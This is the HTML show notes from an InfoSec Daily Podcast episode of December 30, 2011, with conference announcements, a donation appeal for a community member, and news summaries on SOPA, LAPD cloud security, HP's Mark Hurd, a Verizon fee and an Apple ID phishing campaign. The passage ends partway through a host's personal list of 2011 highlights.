		<description><![CDATA[InfoSec Daily Podcast Episode 556 for December 30, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, and Geordy Rostad. &#160; Announcements: Brad Smith (theNurse) We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a [...]]]></description>
			<content:encoded><![CDATA[<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 556 for December 30, 2011. &nbsp;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, and Geordy Rostad.</span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad Smith (theNurse)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CampusCon 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 21, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: WIT {Waterford Institute of Technology} Sports &#8211; Waterford, Ireland</span><br />
	<a href="http://campuscon.hackingwit.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://campuscon.hackingwit.com</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">(from Baconzombie)</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts January 24, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Discount Code:</span><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25484"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=25484</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">ShmooCon 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 27th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington Hilton Hotel, Washington, DC</span><br />
	<a href="http://www.shmoocon.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.shmoocon.org</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Bellingham Technical College &#8211; Bellingham, WA</span><br />
	<a href="http://www.linuxfestnorthwest.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: MU Forensic Science Center</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Huntington, West Virginia </span><br />
	<a href="http://aide.marshall.edu/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://aide.marshall.edu</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; &quot;Dropping the Deuce&quot;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://www.dailykos.com/story/2011/12/29/1049815/-Internet-giants-seriously-considering-nuclear-option-to-stop-SOPA"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.dailykos.com/story/2011/12/29/1049815/-Internet-giants-seriously-considering-nuclear-option-to-stop-SOPA</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">When the home pages of Google.com, Amazon.com, Facebook.com, and their Internet allies simultaneously turn black with anti-censorship warnings that ask users to contact politicians about a vote in the U.S. Congress the next day on SOPA, you&#39;ll know they&#39;re finally serious.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">True, it would be the political equivalent of a nuclear option&#8211;possibly drawing retributions from the the influential politicos backing SOPA and Protect IP&#8211;but one that could nevertheless be launched in 2012.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;There have been some serious discussions about that,&quot; says Markham Erickson, who heads the</span><a href="http://www.netcoalition.com/"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:underline;vertical-align:baseline;">NetCoalition</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;"> trade association that counts Google, Amazon.com, eBay, and Yahoo as members. &quot;It has never happened before.&quot;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&#8230;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.computerworld.com/s/article/9222932/Plans_to_migrate_LAPD_to_Google_s_cloud_apps_dropped"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.computerworld.com/s/article/9222932/Plans_to_migrate_LAPD_to_Google_s_cloud_apps_dropped</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Bad news [if you&rsquo;re a cloud aficionado&hellip;], apparently Google Inc.&rsquo;s cloud resident email and applications products have been rejected by a single component of the City of Los Angeles, namely the Los Angeles Police Department. Evidently, the products do not meet United States Department of Justice and Federal Bureau of Investigation security guidelines for law enforcement agencies (in this case CJIS). We do applaud the LAPD for it&rsquo;s decision to protect and defend it&rsquo;s confidential information.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://news.cnet.com/8301-30686_3-57349688-266/former-hp-ceo-mark-hurd-loses-appeal-to-keep-letter-sealed"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://news.cnet.com/8301-30686_3-57349688-266/former-hp-ceo-mark-hurd-loses-appeal-to-keep-letter-sealed</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Mark Hurd, Hewlett-Packard&#39;s former CEO and now the current president of Oracle, lost his fight in court this week to keep confidential a letter alleging sexual harassment.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A Delaware court ruled yesterday that Hurd had not established &quot;good cause&quot; to keep the letter under wraps. (Here&#39;s the </span><a href="http://www.scribd.com/doc/76720572/hurd-delware-supremecourt"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">court record</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">uploaded by </span><a href="http://allthingsd.com/20111229/hurd-loses-appeal-to-keep-accusers-letter-confidential/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">All Things Digital</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&#39;s Arik Hesseldahl.)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The letter in question is from </span><a href="http://news.cnet.com/8301-1001_3-20044745-92.html"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">lawyers representing Jodie Fisher</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, a sometime actress who worked as a contractor for HP to its board of directors. In the letter, she accuses Hurd of harassment that occurred from 2007 to 2009. And she also alleges that during one visit in 2008, Hurd told her about HP&#39;s then-confidential plan to acquire IT services EDS. The letter is being sought by investors, who are suing HP, accusing the company of not acting in the best interest of shareholders.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">As part of the lawsuit, the plaintiffs have been seeking to make public both the letter that accuses Hurd of harassment as well as a report documenting the result of an internal investigation conducted by HP&#39;s board of directors. Plaintiffs had argued that the letter and report offered shareholders insight into possible corporate wrongdoing and waste that may have arisen due to the harassment case that led to Hurd&#39;s resignation. Investors involved in the suit also want the terms of Hurd&#39;s severance package from HP made public.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://news.cnet.com/8301-30686_3-57349742-266/verizon-wireless-yep-thatll-be-$2-to-pay-your-bill-online"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://news.cnet.com/8301-30686_3-57349742-266/verizon-wireless-yep-thatll-be-$2-to-pay-your-bill-online</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In what has to be the asshat move of the month, it seems that Verizon Wireless has decided that they want to charge customers $2 to pay their bills online. &nbsp;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A leaked memo from the company first </span><a href="http://www.engadget.com/2011/12/29/leaked-memo-details-verizons-2-fee-for-paying-your-bill-autod/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">reported by Engadget</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, showed some of the details of the new plan. And the </span><a href="http://www.phonescoop.com/articles/article.php?a=9549"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">blog Phone Scoop got confirmation from a Verizon representative</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> on Thursday of the change.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The new fee will go into effect starting January 15 and doesn&#39;t apply to customers paying their bills with an electronic check or who enroll in autopay using a credit, debit, or AT&amp;T cards, according to the memo posted on Endgadget. Customers using Verizon Wireless gift cards or Verizon Wireless device rebate cards and customers using standard paper check and money orders made payable directly to Verizon Wireless will also not be charged a fee, Phone Scoop reported.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Verizon said that customers making single payments online will be notified of the fee before they complete their transactions.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The fee associated with paying your bill online is part of a larger trend by companies to extract more money from customers to access certain forms of payment. Bank of America was criticized earlier this year for its plans to charge customers a $5 fee to use debit cards.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Verizon&#39;s plan seems to make little sense, given that the company offers several ways to avoid the fee. Verizon didn&#39;t elaborate on why it&#39;s charging this fee. My guess is that the company that clears these payments is charging Verizon a fee that Verizon is passing on to customers. Still, it seems ridiculous that paying a bill online or by phone could cost Verizon more than processing a hand-written check or money order that is sent to the company through the regular mail.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.whnt.com/news/whnt-phishing-scam-targets-new-owners-of-apple-products-20111229,0,4765566.story"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.whnt.com/news/whnt-phishing-scam-targets-new-owners-of-apple-products-20111229,0,4765566.story</span></a><br />
	<a href="http://www.whnt.com/news/whnt-phishing-scam-targets-new-owners-of-apple-products-20111229,0,4765566.story"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">If you own an AppleID account, be sure to look out for a well-crafted phishing scam that&#39;s been going o</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">ver the past week. &nbsp;The email has targeted Apple users, fooling them into give their Apple IDs and billing information.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Internet security firm </span><a href="http://blog.intego.com/beware-of-apple-billing-information-phishing-e-mails/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Intego</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> says the email was sent to many owners of iPhone, iPod and iMac with the &quot;Apple update your Billing Information&quot; in the subject line.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">This is how the phishing scam works:</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">After the Apple users open the email, they will find a message claiming to have originated from &quot;appleid@id.apple.com.&rdquo;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The email will tell the users that their current billing records are &quot;out of date,&quot; and it will provide a link to the Apple Store, urging the users to click on that link and confirm their billing records. However, if the users click the link, they will be directed to a fake Apple sign-in page. Users who received the email, said the fake sign-in page is nearly identical to the real sign-in page.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Once the users enter their Apple ID and password, they will be reminded to update their billing account information, especially their credit card information.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Geordy&rsquo;s Top &ldquo;6&rdquo; Moments of 2011:</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Top &ldquo;anything&rdquo; lists are notoriously hard to make, especially when you&rsquo;re trying to sort through a year&#39;s worth of memories and can barely remember last week. &nbsp;So without further ado, here is my best of 2011 &#8211; my top seven personal moments of the year because I couldn&rsquo;t keep it to five.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">6) </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Sownage 2011</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &#8211; This single breach was arguably one of the largest and most poorly handled security incidents of all time and it propelled infosec in front of a lot of fresh faces. &nbsp;This incident personally opened my eyes to what kind of company Sony is and resulted in countless piles of bullshit metrics and excuses. &nbsp;This event makes me question the viability of a Playstation 4 platform.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">5) </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Toorcon Seattle</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &#8211; Since I did not get to go to Derbycon, I have to give mad props to h1kari and the rest of the crew who put on Toorcon. &nbsp;They took a different approach from any other con. &nbsp;Instead of turning away speakers, adding tracks or days, they simple used time compression. &nbsp;In roughly 8 hours, I saw nearly 30 talks. &nbsp;It was an amazing firehose of knowledge and free beer. &nbsp;I hope they do it the same next time(2013) since it was a raging success in my opinion.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">4) </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Brian Alseth Interview</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &#8211; If I had to pick a show from this year that I value the most, I would say it was the Brian Alseth interview which is episode 434. &nbsp;To remind the audience, Brian Alseth is an attorney with the Washington State branch of the ACLU. &nbsp;His job has been partially to make the tech community aware of the great things they are doing for our community. &nbsp;Brian is awesome because he doesn&rsquo;t give you a legalese bullshit answer like a typical attorney. &nbsp;He will say exactly what is on his mind. &nbsp;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">3) </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Schuyler Towne visiting BLR</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &#8211; Schuyler as everyone knows has been involved in a bit of a debacle over his kickstarter project. &nbsp;While he&rsquo;s been working on that, he&rsquo;s also been on a tour of hackspaces and companies to teach people about lock history, lock picking and anything else you could possibly want to know related to locks. &nbsp;Schulyer came out to my hackerspace, Black Lodge Research in Redmond, WA a few months back and gave us a whole day of his time. &nbsp;I have to say he has more curiosity and knowledge of physical locking mechanisms of anyone I&rsquo;ve ever met but I would also add that he is one of the most generous and transparent people I&rsquo;ve ever met either. &nbsp;Anyone who has met him and talked to him for 15 minutes would probably say the same thing.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">2) </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Chris Hoff</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &#8211; finding my wallet in a random Las Vegas bar. &nbsp;I wasn&rsquo;t even drunk that night but my wallet slipped out of my pocket and I didn&rsquo;t notice. &nbsp;When I woke up I freaked out since I drove all the way to Vegas and really didn&rsquo;t want to drive the 1400 miles home without my ID. &nbsp;Hoff spotted the wallet and turned to twitter to see if anyone knew who the hell I was. &nbsp;Thankfully the community is not all that large and people who follow both of us were able to get us in touch. &nbsp;That event certainly speaks highly of our community of hackers and miscreants. </span><br />
